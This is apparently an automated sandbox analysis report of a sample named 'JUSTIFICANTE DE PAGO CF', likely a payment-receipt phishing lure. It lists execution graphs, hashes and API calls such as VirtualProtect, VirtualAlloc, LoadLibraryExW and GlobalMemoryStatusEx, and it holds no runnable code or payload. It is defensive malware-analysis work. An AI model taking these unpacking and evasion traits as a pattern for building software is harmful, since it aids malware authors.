                                                                                • Opcode ID: 5eca439d0144586a3cd058478e9b6c99a377d134585080ccc0686b273e9b89b2
                                                                                • Instruction ID: 9a72fd208f72d21796a9a1eb7afc7ed15366f72f7e57851f6773c68f2ba2fd6c
                                                                                • Opcode Fuzzy Hash: 5eca439d0144586a3cd058478e9b6c99a377d134585080ccc0686b273e9b89b2
                                                                                • Instruction Fuzzy Hash: 06514770E10605AFD748DF6AF945A8A7BE7FFD8300F14C539C019AB268EF3858098B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:13.4%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:173
                                                                                Total number of Limit Nodes:19
                                                                                execution_graph 40613 2e07268 40614 2e0726a DeleteFileW 40613->40614 40616 2e072e7 40614->40616 40617 2e00848 40619 2e0084e 40617->40619 40618 2e0091b 40619->40618 40624 6414428 40619->40624 40628 6414438 40619->40628 40632 2e01380 40619->40632 40639 2e01498 40619->40639 40625 6414438 40624->40625 40646 6413c74 40625->40646 40629 6414447 40628->40629 40630 6413c74 4 API calls 40629->40630 40631 6414468 40630->40631 40631->40619 40634 2e01396 40632->40634 40633 2e01490 40633->40619 40634->40633 40638 2e01498 3 API calls 40634->40638 40789 2e07440 40634->40789 40796 2e07328 40634->40796 40800 2e07319 40634->40800 40638->40634 40640 2e01396 40639->40640 40641 2e01490 40640->40641 40642 2e01498 3 API calls 40640->40642 40643 2e07440 3 API calls 40640->40643 40644 2e07328 3 API calls 40640->40644 40645 2e07319 3 API calls 40640->40645 40641->40619 40642->40640 40643->40640 40644->40640 40645->40640 40647 6413c7f 40646->40647 40650 64153d4 40647->40650 40649 6415dee 40649->40649 40651 64153df 40650->40651 40652 6416514 40651->40652 40654 64181a0 40651->40654 40652->40649 40655 64181c1 40654->40655 40656 64181e5 40655->40656 40659 6418340 40655->40659 40666 6418350 40655->40666 40656->40652 40660 64183a4 40659->40660 40661 641834f 40659->40661 40665 6418408 40660->40665 40674 6416e58 40660->40674 40662 6418396 40661->40662 40670 64162e0 40661->40670 40662->40656 40667 641835d 40666->40667 40668 6418396 40667->40668 40669 64162e0 4 API calls 40667->40669 40668->40656 40669->40668 40671 64162eb 40670->40671 40672 6416e58 4 API calls 40671->40672 40673 6418408 40671->40673 40672->40673 40673->40673 40675 6416e63 40674->40675 40681 6416e68 40675->40681 40677 6418477 40685 641d918 40677->40685 40694 641d900 40677->40694 40678 64184b1 40678->40665 40684 6416e73 40681->40684 40682 6419878 40682->40677 40683 64181a0 4 API calls 40683->40682 40684->40682 40684->40683 40687 641d949 40685->40687 40689 641da49 40685->40689 40686 641d955 40686->40678 40687->40686 40702 641db80 40687->40702 40707 641db90 40687->40707 40688 641d995 40711 641ee81 40688->40711 40720 641ee90 40688->40720 40689->40678 40695 641d918 40694->40695 40697 641d955 40695->40697 40700 641db80 3 API calls 40695->40700 40701 641db90 3 API calls 40695->40701 40696 641d995 40698 641ee81 2 API calls 40696->40698 40699 641ee90 2 API calls 40696->40699 40697->40678 40698->40697 40699->40697 40700->40696 40701->40696 40703 641db90 40702->40703 40729 641dbd0 40703->40729 40738 641dbe0 40703->40738 40704 641db9a 40704->40688 40709 641dbd0 2 API calls 40707->40709 40710 641dbe0 2 API calls 40707->40710 40708 641db9a 40708->40688 40709->40708 40710->40708 40712 641eebb 40711->40712 40754 641f3d0 40712->40754 40759 641f3e0 40712->40759 40713 641ef3e 40714 641cf90 GetModuleHandleW 40713->40714 40716 641ef6a 40713->40716 40715 641efae 40714->40715 40717 641fd65 CreateWindowExW 40715->40717 40717->40716 40721 641eebb 40720->40721 40726 641f3d0 GetModuleHandleW 40721->40726 40727 641f3e0 GetModuleHandleW 40721->40727 40722 641ef3e 40723 641cf90 GetModuleHandleW 40722->40723 40725 641ef6a 40722->40725 40724 641efae 40723->40724 40784 641fd65 40724->40784 40726->40722 40727->40722 40730 641dbd5 40729->40730 40734 641dc14 40730->40734 40747 641cf90 40730->40747 40733 641dc0c 40733->40734 40735 641de18 GetModuleHandleW 40733->40735 40734->40704 40736 641de45 40735->40736 40736->40704 40739 641dbf1 40738->40739 40742 641dc14 40738->40742 40740 641cf90 GetModuleHandleW 40739->40740 40741 641dbfc 40740->40741 40741->40742 40746 641de6a GetModuleHandleW 40741->40746 40742->40704 40743 641dc0c 40743->40742 40744 641de18 GetModuleHandleW 40743->40744 40745 641de45 40744->40745 40745->40704 40746->40743 40748 641ddd0 GetModuleHandleW 40747->40748 40750 641dbfc 40748->40750 40750->40734 40751 641de6a 40750->40751 40752 641cf90 GetModuleHandleW 40751->40752 40753 641de8c 40752->40753 40753->40733 40755 641f40d 40754->40755 40756 641f48e 40755->40756 40764 641f540 40755->40764 40774 641f550 40755->40774 40760 641f40d 40759->40760 40761 641f48e 40760->40761 40762 641f540 GetModuleHandleW 40760->40762 40763 641f550 GetModuleHandleW 40760->40763 40762->40761 40763->40761 40765 641f550 40764->40765 40766 641cf90 GetModuleHandleW 40765->40766 40767 641f589 40765->40767 40766->40767 40768 641cf90 GetModuleHandleW 40767->40768 40773 641f745 40767->40773 40769 641f6cb 40768->40769 40770 641cf90 GetModuleHandleW 40769->40770 40769->40773 40771 641f719 40770->40771 40772 641cf90 GetModuleHandleW 40771->40772 40771->40773 40772->40773 40773->40756 40775 641f565 40774->40775 40776 641cf90 GetModuleHandleW 40775->40776 40777 641f589 40775->40777 40776->40777 40778 641cf90 GetModuleHandleW 40777->40778 40783 641f745 40777->40783 40779 641f6cb 40778->40779 40780 641cf90 GetModuleHandleW 40779->40780 40779->40783 40781 641f719 40780->40781 40782 641cf90 GetModuleHandleW 40781->40782 40781->40783 40782->40783 40783->40756 40785 641fd69 40784->40785 40786 641fd9d CreateWindowExW 40784->40786 40785->40725 40788 641fed4 40786->40788 40788->40788 40790 2e0744a 40789->40790 40792 2e07464 40790->40792 40804 642c458 40790->40804 40809 642c449 40790->40809 40791 2e074aa 40791->40634 40792->40791 40814 642e347 40792->40814 40798 2e0733e 40796->40798 40797 2e074aa 40797->40634 40798->40797 40799 642e347 3 API calls 40798->40799 40799->40797 40802 2e07328 40800->40802 40801 2e074aa 40801->40634 40802->40801 40803 642e347 3 API calls 40802->40803 40803->40801 40806 642c46d 40804->40806 40805 642c682 40805->40792 40806->40805 40807 642cab0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40806->40807 40808 642ca78 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40806->40808 40807->40806 40808->40806 40811 642c458 40809->40811 40810 642c682 40810->40792 40811->40810 40812 642cab0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40811->40812 40813 642ca78 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40811->40813 40812->40811 40813->40811 40815 642e352 40814->40815 40816 642c458 3 API calls 40815->40816 40817 642e359 40816->40817 40817->40791 40818 6415788 DuplicateHandle 40819 641581e 40818->40819 40820 641e038 40821 641e080 LoadLibraryExW 40820->40821 40822 641e07a 40820->40822 40823 641e0b1 40821->40823 40822->40821

                                                                                Executed Functions

                                                                                Function 0641DBE0 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3105 641dbe0-641dbef 3106 641dbf1-641dbfe call 641cf90 3105->3106 3107 641dc1b-641dc1f 3105->3107 3112 641dc00-641dc0e call 641de6a 3106->3112 3113 641dc14 3106->3113 3109 641dc21-641dc2b 3107->3109 3110 641dc33-641dc74 3107->3110 3109->3110 3116 641dc81-641dc8f 3110->3116 3117 641dc76-641dc7e 3110->3117 3112->3113 3124 641dd50-641de10 3112->3124 3113->3107 3118 641dc91-641dc96 3116->3118 3119 641dcb3-641dcb5 3116->3119 3117->3116 3121 641dca1 3118->3121 3122 641dc98-641dc9f call 641cf9c 3118->3122 3123 641dcb8-641dcbf 3119->3123 3125 641dca3-641dcb1 3121->3125 3122->3125 3127 641dcc1-641dcc9 3123->3127 3128 641dccc-641dcd3 3123->3128 3156 641de12-641de15 3124->3156 3157 641de18-641de43 GetModuleHandleW 3124->3157 3125->3123 3127->3128 3131 641dce0-641dce9 call 6416144 3128->3131 3132 641dcd5-641dcdd 3128->3132 3136 641dcf6-641dcfb 3131->3136 3137 641dceb-641dcf3 3131->3137 3132->3131 3139 641dd19-641dd26 3136->3139 3140 641dcfd-641dd04 3136->3140 3137->3136 3146 641dd49-641dd4f 3139->3146 3147 641dd28-641dd46 3139->3147 3140->3139 3141 641dd06-641dd16 call 641bb00 call 641cfac 3140->3141 3141->3139 3147->3146 3156->3157 3158 641de45-641de4b 3157->3158 3159 641de4c-641de60 3157->3159 3158->3159
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254643713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6410000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 3aabc65e35119266e93953b9ff17cb6a897bfdcc4c225f20cf48b41c4dea8fed
                                                                                • Instruction ID: a1bbb02239a69c9f80d55895253098962665bf271bd8e2d108565c8a4fc07a57
                                                                                • Opcode Fuzzy Hash: 3aabc65e35119266e93953b9ff17cb6a897bfdcc4c225f20cf48b41c4dea8fed
                                                                                • Instruction Fuzzy Hash: DB7113B0A00B058FD7A5DF2AD44475BBBF5FF88204F00892ED49A9BB50EB75E945CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0641FD65 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0641FEC2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254643713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6410000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: 6549cd4685442b98c3d26109a1fa38c9ff4bcb0f6556120d661d71477b83342e
                                                                                • Instruction ID: 7b3ac82b49689e3228bd9d1fc2a21b1c987bcda24780ffc75c9cabfcfc9e13ab
                                                                                • Opcode Fuzzy Hash: 6549cd4685442b98c3d26109a1fa38c9ff4bcb0f6556120d661d71477b83342e
                                                                                • Instruction Fuzzy Hash: 4B51F1B1C00349AFDF55CF99C884ADEBFB6BF48300F15816AE818AB220D7759945CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0642D670 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254799140.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6420000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 48dfd0954b26a675913ee3b3ed384aacd413d34e05af680f0d8de589c8a43f5c
                                                                                • Instruction ID: 569dfc1b63c6b3ffa5320aba67f1139f17487d5fc208beaff49a65b92f44886d
                                                                                • Opcode Fuzzy Hash: 48dfd0954b26a675913ee3b3ed384aacd413d34e05af680f0d8de589c8a43f5c
                                                                                • Instruction Fuzzy Hash: 5041F171E143968FCB04DFA9D8546AEBFB1AF89310F1585ABD408A7291DB389841CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0641FDA4 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0641FEC2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254643713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6410000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: 268f34bf69d6bee3574cb1282c1b07a9dbaf7011d6a8581bb63bb648e14113e0
                                                                                • Instruction ID: bd36ede8b175053acd3dc88421d70cf5f7eb98fd31dbf54e4a3e07b8e4e5284d
                                                                                • Opcode Fuzzy Hash: 268f34bf69d6bee3574cb1282c1b07a9dbaf7011d6a8581bb63bb648e14113e0
                                                                                • Instruction Fuzzy Hash: 5551E2B1D003499FDB54CF9AC884ADEBBF6FF48300F24812AE819AB210D7759946CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0641FDB0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0641FEC2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254643713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6410000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: 6b482891cc2d1207164128f495305243b8b18e21c8186ccc5f62d584a163e079
                                                                                • Instruction ID: 634f4bae95543fb25a6a615d3e9d892e0349223d893ccb9ee91ffa0f7e69acbb
                                                                                • Opcode Fuzzy Hash: 6b482891cc2d1207164128f495305243b8b18e21c8186ccc5f62d584a163e079
                                                                                • Instruction Fuzzy Hash: 8B41D2B1C003499FDB54CF9AC884ADEBBF6BF48300F24812AE819AB210D775A945CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06415780 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0641580F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254643713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6410000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 31df0c7c3813abf5aee172ef7a886430f8a361c0ed9f8f74854be8e7fec57f9c
                                                                                • Instruction ID: a3d04099311563ffe9fd903c3ee2571fea3f776c5e3f18c2fff5fc2eb15dc8b8
                                                                                • Opcode Fuzzy Hash: 31df0c7c3813abf5aee172ef7a886430f8a361c0ed9f8f74854be8e7fec57f9c
                                                                                • Instruction Fuzzy Hash: C62105B5900248AFDB10CF9AD984ADEBFF9FB48310F10841AE918A7310D378A954CFA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06415788 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0641580F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254643713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6410000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 42fd3dbefe61fdf0f0b739f01f232492a131f557d8d23dfe35ab04b79fc5aad5
                                                                                • Instruction ID: 525f57a2e912b4b163c52a4f3ede3475cead8e61e4eea8c57e89289b94d15f50
                                                                                • Opcode Fuzzy Hash: 42fd3dbefe61fdf0f0b739f01f232492a131f557d8d23dfe35ab04b79fc5aad5
                                                                                • Instruction Fuzzy Hash: 2721E4B5D002489FDB10CF9AD984ADEBFF9FB48310F14841AE918A7310D378A950CFA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02E07261 Relevance: 1.6, APIs: 1, Instructions: 61fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 02E072D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3212993954.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_2e00000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: DeleteFile
                                                                                • String ID:
                                                                                • API String ID: 4033686569-0
                                                                                • Opcode ID: 9a864cc07756577fb5d6c67c025fc9f5a89876181dab3d8844aced94ae9433c2
                                                                                • Instruction ID: e89dc50e84c8928a9f4de42fb093586b1a5e59d0fadd1bd470b4bc4c609db8a0
                                                                                • Opcode Fuzzy Hash: 9a864cc07756577fb5d6c67c025fc9f5a89876181dab3d8844aced94ae9433c2
                                                                                • Instruction Fuzzy Hash: FD2115B1C0065A9BCB10DF9AC545AEEFBF4EB48310F11C16AE818A7280D738A945CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0641E032 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0641E0A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254643713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6410000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 436eddeffb92d1595a1e18c17c4c133223a9d5f196cea394ff9839ce65eca893
                                                                                • Instruction ID: 03bb79fba44780f927d12761fa2c915e87757bc7043b6b9352629606014a432a
                                                                                • Opcode Fuzzy Hash: 436eddeffb92d1595a1e18c17c4c133223a9d5f196cea394ff9839ce65eca893
                                                                                • Instruction Fuzzy Hash: 7E1114B6C003489FDB20DF9AC544ADEFBF5EB89310F11842AD959A7300C779A545CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02E07268 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 02E072D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3212993954.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_2e00000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: DeleteFile
                                                                                • String ID:
                                                                                • API String ID: 4033686569-0
                                                                                • Opcode ID: f17f5ac00d76c7597673ffbfa5bebca88aadce961053ab8bbb75f261e52eedea
                                                                                • Instruction ID: 1a358b93035f08c55cacd76dea848935392f390fe4f72cf66dc1b9e2635f29bc
                                                                                • Opcode Fuzzy Hash: f17f5ac00d76c7597673ffbfa5bebca88aadce961053ab8bbb75f261e52eedea
                                                                                • Instruction Fuzzy Hash: 761133B1C0065A9BCB10CF9AC544AAEFBF4EF48320F11816AE818A7240D738A941CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0642CA6C Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0642D6C2), ref: 0642D7AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254799140.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6420000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemoryStatus
                                                                                • String ID:
                                                                                • API String ID: 1890195054-0
                                                                                • Opcode ID: b47ef0b65c68cc35b9a9d8bb60d8e5f781ca1e82bce3cb99388078146076c41a
                                                                                • Instruction ID: 7fffbc30431b0a59f5370790f53c6d2e08174e9dc3f5083dfcff0f6e245c2187
                                                                                • Opcode Fuzzy Hash: b47ef0b65c68cc35b9a9d8bb60d8e5f781ca1e82bce3cb99388078146076c41a
                                                                                • Instruction Fuzzy Hash: 411103B1C0065A9BCB10DF9AC548BAEFBF4EF48310F11816AE918A7240D778A940CFE1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0642D740 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0642D6C2), ref: 0642D7AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254799140.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6420000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemoryStatus
                                                                                • String ID:
                                                                                • API String ID: 1890195054-0
                                                                                • Opcode ID: 69c2647a9049fecc1ab52bd8da818baaa7a1a8b82ed1013a3abb05847a3c01f5
                                                                                • Instruction ID: d48eb8b4384593aebbf78c6e9a328316ce65d30bb310996fe4243ce93b868519
                                                                                • Opcode Fuzzy Hash: 69c2647a9049fecc1ab52bd8da818baaa7a1a8b82ed1013a3abb05847a3c01f5
                                                                                • Instruction Fuzzy Hash: 691114B1C006599FCB10DF9AC544BEEFBF5AF48310F15816AD818A7240D378A940CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0641E038 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0641E0A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254643713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6410000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 7ded18971858f0f846f90080ae725d626496411aee0db3093598a7db09c13599
                                                                                • Instruction ID: 3fab27bb4f504aaf768d7962717791b0246c264ff5bf819da4193fd4fd0779b0
                                                                                • Opcode Fuzzy Hash: 7ded18971858f0f846f90080ae725d626496411aee0db3093598a7db09c13599
                                                                                • Instruction Fuzzy Hash: E211F3BAC003499FDB10DF9AC544ADEFBF5EB89310F10842AD919A7210C779A545CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0641CF90 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0641DBFC), ref: 0641DE36
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254643713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6410000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 914e9288f6ca862f8614be5e473f85e2a1928e03a50b3551fcb6a307120f0dfd
                                                                                • Instruction ID: 74f588d3ec0f70f78f3ad25f9b5bdcb8cc8f3a756d5424ec81010def946428a2
                                                                                • Opcode Fuzzy Hash: 914e9288f6ca862f8614be5e473f85e2a1928e03a50b3551fcb6a307120f0dfd
                                                                                • Instruction Fuzzy Hash: 9911F0B6C007499FCB10DF9AC448AAEFBF4EF88210F10845AD419BB200D379A545CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 013DD044 Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3211685000.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_13dd000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e6e5d39d4335cd4f2abbd98b4496fc440b5e28e0246773ae3ba803f9c15d8de3
                                                                                • Instruction ID: e9277c013905566eaa35886f70b3dc5faac164bf106545c4b15962b8cb3df0c1
                                                                                • Opcode Fuzzy Hash: e6e5d39d4335cd4f2abbd98b4496fc440b5e28e0246773ae3ba803f9c15d8de3
                                                                                • Instruction Fuzzy Hash: 9C213772504204DFCB15CF68E9C0B26BB69FB84318F20C56DE9490B392C73AD446CA61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 013DD006 Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3211685000.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_13dd000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 19b75ac6edfbf5fb9f355735ccbbda6d3f8a2a35b9a04a0ff795eb83999304de
                                                                                • Instruction ID: b9bad79bcd2a98636183cb635efe9de8c4daa944f698a2fff3234e55045942ed
                                                                                • Opcode Fuzzy Hash: 19b75ac6edfbf5fb9f355735ccbbda6d3f8a2a35b9a04a0ff795eb83999304de
                                                                                • Instruction Fuzzy Hash: D631507550E3C08FD703CB64D9A4715BF71AF46214F29C5DBD8888F2A3C23A980ACB62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:10.8%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:38
                                                                                Total number of Limit Nodes:3
                                                                                execution_graph 7725 2a03ec0 7726 2a03ece 7725->7726 7727 2a03ed4 7726->7727 7733 2a04557 7726->7733 7737 2a0686f 7726->7737 7741 2a0455e 7726->7741 7744 2a06e0e 7726->7744 7747 2a04488 7726->7747 7734 2a0456a 7733->7734 7750 2a0bad0 7734->7750 7740 2a0bad0 VirtualProtect 7737->7740 7738 2a0688c 7739 2a045f1 7739->7737 7739->7738 7740->7739 7742 2a0459b 7741->7742 7743 2a0bad0 VirtualProtect 7741->7743 7743->7742 7746 2a0bad0 VirtualProtect 7744->7746 7745 2a06e29 7746->7745 7758 2a0c850 7747->7758 7752 2a0bae3 7750->7752 7754 2a0be98 7752->7754 7755 2a0bee0 VirtualProtect 7754->7755 7757 2a0459b 7755->7757 7761 2a0c878 7758->7761 7763 2a0c88b 7761->7763 7765 2a0c928 7763->7765 7766 2a0c968 VirtualAlloc 7765->7766 7768 2a044a8 7766->7768 7769 101d030 7770 101d048 7769->7770 7771 101d0a3 7770->7771 7773 2a0c2e0 7770->7773 7774 2a0c308 7773->7774 7777 2a0c610 7774->7777 7775 2a0c32f 7778 2a0c633 7777->7778 7779 2a0bad0 VirtualProtect 7778->7779 7781 2a0c6df 7778->7781 7780 2a0c6d3 7779->7780 7780->7775 7781->7775

                                                                                Executed Functions

                                                                                Function 02A0BE98 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 422 2a0be98-2a0bf19 VirtualProtect 425 2a0bf22-2a0bf47 422->425 426 2a0bf1b-2a0bf21 422->426 426->425
                                                                                APIs
                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 02A0BF0C
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2152760246.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2a00000_Reramvw.jbxd
